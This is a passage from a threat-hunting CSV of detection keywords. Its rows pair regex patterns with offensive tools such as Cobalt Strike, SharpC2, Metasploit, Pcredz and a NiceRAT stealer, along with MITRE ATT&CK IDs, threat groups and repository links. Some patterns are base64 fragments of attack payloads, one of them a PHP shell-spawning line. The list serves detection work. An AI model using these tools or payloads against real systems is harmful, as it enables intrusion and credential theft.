- T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*payload_scripts/sleepmask*",".{0,1000}payload_scripts\/sleepmask.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*payload_section.cpp*",".{0,1000}payload_section\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*payload_section.hpp*",".{0,1000}payload_section\.hpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*payload_spellshell.c*",".{0,1000}payload_spellshell\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_spellshell.exe*",".{0,1000}payload_spellshell\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_tidy.rb*",".{0,1000}payload_tidy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Payload_Type/freyja/*",".{0,1000}Payload_Type\/freyja\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*PayloadCommsHost*",".{0,1000}PayloadCommsHost.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*--payload-cookie*",".{0,1000}\-\-payload\-cookie.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" 
"*Payload-Download-Cradles*",".{0,1000}Payload\-Download\-Cradles.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*PayloadFormat.ASSEMBLY*",".{0,1000}PayloadFormat\.ASSEMBLY.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.DLL*",".{0,1000}PayloadFormat\.DLL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.EXE*",".{0,1000}PayloadFormat\.EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.POWERSHELL*",".{0,1000}PayloadFormat\.POWERSHELL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
"*PayloadFormat.SHELLCODE*",".{0,1000}PayloadFormat\.SHELLCODE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadFormat.SVC_EXE*",".{0,1000}PayloadFormat\.SVC_EXE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*payloadgenerator.py*",".{0,1000}payloadgenerator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*payloads/Follina*",".{0,1000}payloads\/Follina.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*payloads/Powershell*",".{0,1000}payloads\/Powershell.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*payloads/shellcodes*",".{0,1000}payloads\/shellcodes.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*payloads_examples*calc.js*",".{0,1000}payloads_examples.{0,1000}calc\.js.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*payloads_examples*calc.xll*",".{0,1000}payloads_examples.{0,1000}calc\.xll.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. 
and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*PayloadsAllTheThings*",".{0,1000}PayloadsAllTheThings.{0,1000}","offensive_tool_keyword","PayloadsAllTheThings","A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! ","T1210 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/PayloadsAllTheThings","1","1","N/A","N/A","1","3","4","2019-02-11T06:34:14Z","2019-02-11T06:29:45Z" "*PayloadService.*",".{0,1000}PayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*--payload-type Macro*",".{0,1000}\-\-payload\-type\sMacro.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*PayloadType.BIND_PIPE*",".{0,1000}PayloadType\.BIND_PIPE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.EXTERNAL*",".{0,1000}PayloadType\.EXTERNAL.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.HTTP*",".{0,1000}PayloadType\.HTTP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.REVERSE_TCP*",".{0,1000}PayloadType\.REVERSE_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*--payload-url */pwn.html",".{0,1000}\-\-payload\-url\s.{0,1000}\/pwn\.html","offensive_tool_keyword","POC","Just 
another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*pcap_linktypes.py*",".{0,1000}pcap_linktypes\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*pcap2john.py*",".{0,1000}pcap2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pcapfile.py*",".{0,1000}pcapfile\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*PcapXray*",".{0,1000}PcapXray.{0,1000}","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","10","1643","275","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z" "*Pcredz -d *",".{0,1000}Pcredz\s\-d\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*Pcredz -f *",".{0,1000}Pcredz\s\-f\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*PCredz -f *.pcap*",".{0,1000}PCredz\s\-f\s.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Pcredz -i *",".{0,1000}Pcredz\s\-i\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*",".{0,1000}PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" 
"*PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8*",".{0,1000}PD9waHAKcGNudGxfZXhlYygnL2Jpbi9zaCcsIFsnLXAnXSk7Cj8.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*pdadjkfkgcafgbceimcpbkalnfnepbnk*",".{0,1000}pdadjkfkgcafgbceimcpbkalnfnepbnk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*PDF_Payload*Doomfist.pdf*",".{0,1000}PDF_Payload.{0,1000}Doomfist\.pdf.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*pdf2john.pl*",".{0,1000}pdf2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pdfcrack -f *.pdf*",".{0,1000}pdfcrack\s\-f\s.{0,1000}\.pdf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PDONUT_INSTANCE*",".{0,1000}PDONUT_INSTANCE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*pe_inject.rb*",".{0,1000}pe_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*pe_packer/dll_main.c*",".{0,1000}pe_packer\/dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer/exe_main.c*",".{0,1000}pe_packer\/exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer/main.c*",".{0,1000}pe_packer\/main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*pe_packer\dll_main.c*",".{0,1000}pe_packer\\dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - 
